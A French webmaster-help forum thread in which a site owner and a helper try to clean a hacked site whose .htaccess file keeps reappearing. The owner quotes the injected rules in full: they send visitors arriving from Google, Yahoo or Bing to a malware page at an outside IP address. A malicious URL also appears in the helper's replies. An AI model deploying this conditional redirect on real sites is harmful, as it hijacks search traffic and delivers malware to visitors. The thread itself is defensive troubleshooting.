problème avec un fichier htaccess bizarre

Question

Bonjour,

Voilà. J'ai un petit problème sur mon site. Je me suis aperçu que certains résultats de recherche Google sur mon site pointaient vers un site malveillant.

Je ne suis pas du tout "calé" dans ce domaine, mais après un bref parcours de mon répertoire distant, je me suis aperçu que plusieurs fichiers .php étaient insérés dans mes pages. Soupçonnant une usurpation de mes identifiants ftp, j'ai donc demandé à mon hébergeur de changer ces identifiants. Le service technique me répond que  mon ordinateur est surement infecté et qu'il faut faire les changement d'identifiants après avoir procédé à l'analyse de mon système via un anti-virus en ligne.
Soit. J'ai donc suivi ce conseil.

J'ai donc fait la vérification de mon système par un anti-virus en ligne. Après balayage minutieux de l'ensemble de mon système, l'analyse a effectivement révélé 4 fichiers infectés. (que mon anti-virus local n'avait jamais vu)
J'ai donc procédé à la désinfection, et ai relancé dans la foulée une 2ème analyse. Pas de problème, il n'y a plus de virus dans mon système.

Sauf que mon problème persiste toujours, mais cette fois j'ai plus de précisions. A savoir que certains résultats "google" (et uniquement lorsqu'on passe par le moteur de recherche, car si l'adresse est tapée directement dans la barre, ça marche bien) pointent parfois vers une page que mon anti-virus bloque car il me signale une menace.

Lorsque cela m'arrive, je vais dans mon éditeur ftp (filezilla) et là, dans le dossier racine (du répertoire distant), il y a un fichier qui n'a rien à faire là, qui est nommé .htaccess. Dès que je supprime ce fichier, tout va bien, les résultats dans google redeviennent parfaitement normaux. Et moi, je n'y comprend rien !

Je retourne tous les jours dans filezilla pour vérifier le contenu de mon site et tous les jours ou presque, je suis obligé de supprimer cet étrange fichier.

Est-ce que quelqu'un peut m'éclairer ????

Merci.
Cordialement
Serge

bg62 · Answer

Je me suis aperçu que certains résultats de recherche Google sur mon site pointaient vers un site malveillant. 
dans ce cas cela vient à 99% de script intégrés dans tes pages, donc scan ou pas tu ne trouveras rien ....
il faut voir de où ça sort et les supprimer  ...

serge5 · Answer

il faut voir de où ça sort et les supprimer ...

OK, mais je fais comment ? Je m'excuse mais je ne suis pas très calé, j'ai fait mon site tout seul (www.serge-ollive.com) et là, ça dépasse mon domaine de compétences (qui n'est déjà pas très étendu :-)))

bg62 · Answer

tu as un site qui a déjà un PR de 3 et 1050 pages environ sur google ... comment veux-tu que l'on trouve le hic ?
"tu t'es aperçu..." en faisant quelles recherches, sur quels mots clés ....
pas à partir de " La grange à   Pisancon" quand même .... :)

serge5 · Answer

En fait il suffit de faire n'importe quelle recherche qui fait apparaitre des résultats vers mon site. Peut importe la recherche et peu importe les résultats, il suffit qu'ils indiquent le site serge-ollive.com.

Mais ça ne le fait pas tout le temps et sur tous les résultats, c'est très aléatoire. Parfois le résultat google pointant vers la page d'accueil va marcher, alors que celui pointant vers la page "biographie" va diriger en réalité vers un virus. Et parfois c'est l'inverse...!

Mais dans tous les cas, je répète : Dès qu'il y a le moindre problème, c'est que mon rpertoire distant contient à tous les coups ce fichier .htaccess. Lorsque je supprime ce fichier, TOUS les résultats Google pointent vers mon site, sans aucun problème.

bg62 · Answer

c'est que mon rpertoire distant contient à tous les coups ce fichier .htaccess
il contient quoi ce fichier, peux-tu mettre le code ici ?
et je viens de cliquer sur un lien qui dirige vers "biographie.html" il n'y a absolument rien de bizarre ...

serge5 · Answer

il contient quoi ce fichier, peux-tu mettre le code ici ? 

Alors là, j'en sais rien. Pour savoir il faudrait qu'il apparaisse à nouveau dans mon répertoire. Depuis ce matin (dernière fois que je l'ai supprimé), il n'est plus ré-apparu.

et je viens de cliquer sur un lien qui dirige vers "biographie.html" il n'y a absolument rien de bizarre ... 
Oui, forcément, puisque j'ai supprimé ce .htaccess ce matin, et que lorsque je le supprime tout redevient normal. Pour le moment, mon site est donc accessible depuis goggle, sur toutes les pages....jusqu'à ce que ce fichier revienne.

bg62 · Answer

jamais vu un tel fichier qui se régénère tout seul !!!
si c'est vraiment le cas, mets-en un (totalement vide) toi-même à la racine du site ... normalement il ne devrait pas être écrasé ...

serge5 · Answer

Jamais vu un tel fichier qui se régénère tout seul !!! 

Bizarre, hein ?

mets-en un (totalement vide) toi-même à la racine du site ... normalement il ne devrait pas être écrasé ... 

OK. Je fais comment ? (vraiment désolé pour mon manque de connaissance... :-(

bg62 · Answer

tu envoies un fichier htaccess.txt (bloc notes de windows) totalement vierge à la racine de ton site
et ensuite tu le renomme dans ton espace distant en .htaccess ... hop !

serge5 · Answer

Ok, je vais essayer ça, et surveiller que l'autre ne revienne pas. Ce sera à priori, rapide à vérifier puisque il revient tous les jours ou presque.

MERCI !

bg62 · Answer

ok @+

bg62 · Answer

ben voilà :
https://transparencyreport.google.com/safe-browsing/search?url=http://hotelturismogoya.com.ar/imgs/go.php&hl=fr
il est là:
https://www.google.fr/search?q=hotelturismogoya.com.ar&ie=utf-8&oe=utf-8&aq=t&client=firefox-a&rlz=1R1GGGL_fr&gws_rd=ssl
donc à moins que tu ne sache de où ça peut provenir, il ne te reste plus qu'à rapatrier tout ton site en local et chercher dans les pages un script qui doit y être et génère ce fichier ...  script qui est certainement lié à un lien ou pub que tu aurais mis ...
une fois éliminé, tout effacer sur le serveur et tout remettre ensuite ...
bon courage ...
car tu as pas mal de pages concernées et faut faire assez vite avant de te faire repérer par les moteurs ...

bg62 · Answer

si tu ne  sais pas exactement où est ce script,
en local (bien protégé !) et tout chercher ....
vraie salo..... ce truc, tu as du te servir d'un lien, d'un script ou autre ... ??

bg62 · Answer

dans l'urgence:
https://longuetraine.fr/?article280/verifier-la-securite-d-un-site-son-certificat
https://longuetraine.fr/?article392/comment-trouver-un-script-malveillant-sur-un-site-web-la-sanction-malware-warning
inscris-toi alors sur norton safe web et demande une analyse ... les résultats sont assez longs à venir mais ça pourra te re-servir ....
là je ne peux rien faire tu n'as plus aucune page accessible, elles sont toutes redirigées ....
- tu re-supprimes ton fichier, tu en remets un vierge à la place et tu mets dessus un chmod à 400 ..;ça évitera ... peut-être le retour
soit tu as un fichier qui contient un virus
soit tu en as un qui contient un script qui te crée ça ...

bg62 · Answer

laisse en 444 alors ... ;)
quand tu auras l'analyse de norton, envoies le lien ...

bg62 · Answer

si tu vires tout de ton espace en ligne, c'est " TOUT " de manière à savoir qu'il n'y reste plus rien de rien, ensuite en regardant tes pages en local, vires ce qui semble ne pas te servir, scripts, js, etc ...

serge5 · Answer

Bon, cette fois, j'ai TOUT viré. il n'y a plus rien du tout dans le répertoire distant.
En local, j'ai déjà parcouru mes pages plus d'une fois, et j'ai viré des balises scripts suspectes et tout ce qui n'avait a priori rien à faire là. Maintenant, il n'y a plus rien. En tout cas, rien de visible.

On va attendre que le .htaccess revienne. Là si il revient avec rien dans le site, je sais pas d'où il arrive...

bg62 · Answer

Là si il revient avec rien dans le site, je sais pas d'où il arrive...
et moi non plus alors ...  si cela devait arriver il te faudrait le signaler à l'hébergeur, mais là ça risque  de prendre un p'tit bout de  temps, je ne sais pas s''ils sont très réactifs dans ce cas là ...

serge5 · Answer

Ben voilà ! quand on parle du loup.... ça parait incroyable, mais IL EST DE RETOUR ! :-)
Donc, là, je suppose qu'il est impossible que ça vienne de mon site, non ? (ou alors faut m'expliquer).

Bon voilà le code :

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteRule .* http://188.124.9.67/a/go.php [R,L]

Mon hébergeur ? Ben eux, je leur ai signalé ça depuis un moment. Ils ne veulent pas changer mes identifiants, ils soutiennent que c'est mon PC qui est infecté. 

(Pour ajouter encore une analyse, j'ai fait vérifier le PC ce matin par un anti-spyware, lequel a trouvé des cookies traceurs qu'il me conseillait de supprimer. Chose faite, mais depuis, le .htaccess a eu le temps de revenir quelques fois. Donc, c'est pas ça non plus...

bg62 · Answer

??? il est où ce fichier .htaccess maintenant ... 
pas en ligne quand même, sur ton DD ?

serge5 · Answer

Mais si, en ligne ! il est ré-apparu dans le dossier "racine" (/) du répertoire distant. Et évidemment, il est tout seul, puisque j'ai enlevé mon site entier du distant.

Le .htaccess n'apparait pas en local ! il n'y a jamais été !

Il n'empêche que le site a beau ne pas être en ligne, si on clique sur un résultat de recherche Google, l'anti-virus bloque bien un site malveillant. A cause de ce seul fichier .htaccess présent dans le répertoire distant.
Si je le supprime, il y aura simplement une erreur 403 indiquant que le site www.serge-ollive.com est inaccessible (forcément, puisqu'il n'est pas en ligne).

bg62 · Answer

actuellement si je vais sur ton site j'ai ceci:
Forbidden
You don't have permission to access / on this server.
Apache/1.3.37 Server at 80.247.228.230 Port 80
donc normalement pas redirection ... (as-tu vidé ton cache internet ?)
quand ce fichier apparait sur ton hébergement, renomme-le htaccess.txt, pompe-le et détruis-le en local
et chez l'hébergeur tu le renommes également et ensuite tu supprimes le fichier renommé, puis F5 dans ton répertoire distant ... normalement il ne doit plus pouvoir revenir ou alors c'est le serveur qui a qq chose ou les accès ftp qui ont été pris ... il n'y a que ces deux solutions-là ... si il revient dans un espace vide !
une histoire de fou !!!

serge5 · Answer

Oui, tu as ça :

You don't have permission to access
on this server.
Apache/1.3.37 Server at 80.247.228.230 Port 80

uniquement si tu vas sur mon site depuis autre part que Google (en tapant directement l'adresse par exemple). Maintenant, tape "serge ollive" dans Google, prend le premier résultat (page d'accueil du site), ton anti-virus doit détecter une menace.

Bon, je vais essayer de faire tout ce que tu me dis. au fait, tu entend quoi par "pompe-le" ? (...le language "courant" du webmastering ne m'est pas du tout familier...:-)

bg62 · Answer

en effet j'ai ceci:
http://www.cijoint.fr/cjlink.php?file=cj201002/cijsSNfdOu.jpg
et c'est une vraie saloperie !!!  si l'on clique dessus on y a droit !!!  merci ;)
il faut fermer l'onglet et ne pas cliquer
bon mais ça ça vient de la version en cache de google puisque l'on part de ses résultats ..
et là t'es pas sorti de l'auberge non plus car il va falloir intervenir auprès de google pour lui demander de supprimer toutes les pages du site de son cache ...
- solution (la mienne ...) tu téléphones à ton hébergeur, tu leur re-soumets le problème et s'il n'y a pas de solution, tu prends ton nom de domaine (tu dois en être propriétaire ...), tu prends un hébergement ailleurs, tu transfère le NDD , tu vérifies et archi-vérifies tes pages, si tu es sur à 200 % tu remets en ligne, puis il y aura toute la partie référencement à re-gérer" aussi bien de ton côté qu'avec google pour ne pas perdre certaines choses déjà acquises !!!
pas chiant pour un sou ce truc !!!
pour ma part, mais là il n'y a que toi qui puisse le faire, je signalerais ça chez google et autres pour les supprimer complétement ^^
bon courage !

serge5 · Answer

Pour le moment, j'ai fait ce que tu m'as dis. J'attend de voir s'il revient.

A vrai dire, je commençais à penser à la solution de passer chez un autre hébergeur...
On va voir...

MERCI

bg62 · Answer

de toutes façons attends ... ne serait-ce que pour tester !
mais il faudra quand même passer par la suppression de la version en cache de google ... là c'est moins rigolo !

serge5 · Answer

oui, mais ça, je dois faire comment. Parce que là, j'étais déjà largué, mais alors maintenant...c'est une autre histoire.
Je m'adresse où, et je demande quoi exactement. ? pourquoi tu dis que "c'est moins rigolo" ?

fait chier ce truc...

bg62 · Answer

une chose à la fois ...
vois déjà si ce fichier reviens
appelle ton hébergeur et mets lui la pression ... !

serge5 · Answer

il est revenu... je commence à désespérer...
Bon, je vais demander à mon hébergeur (encore une fois) de changer mes identiiants ftp, en lui disant que j'ai vérifié et re-vérifié, et qu'à priori je ne suis pas infecté. Il devraient craquer...

bg62 · Answer

mot de passe ... oui ... mais si c'est pour accéder à une "zone" pourrie !
il ne t'a rien dit d'autre ?

bg62 · Answer

ok alors attends un bon moment avant ... de ... ! ou ne remets après qq jours que ton fichier index pour voir, car tout ça va avoir des répercussions dans le moteurs de recherche à force !

Problème avec un fichier htaccess bizarre - Page 2

Discussions similaires

Newsletters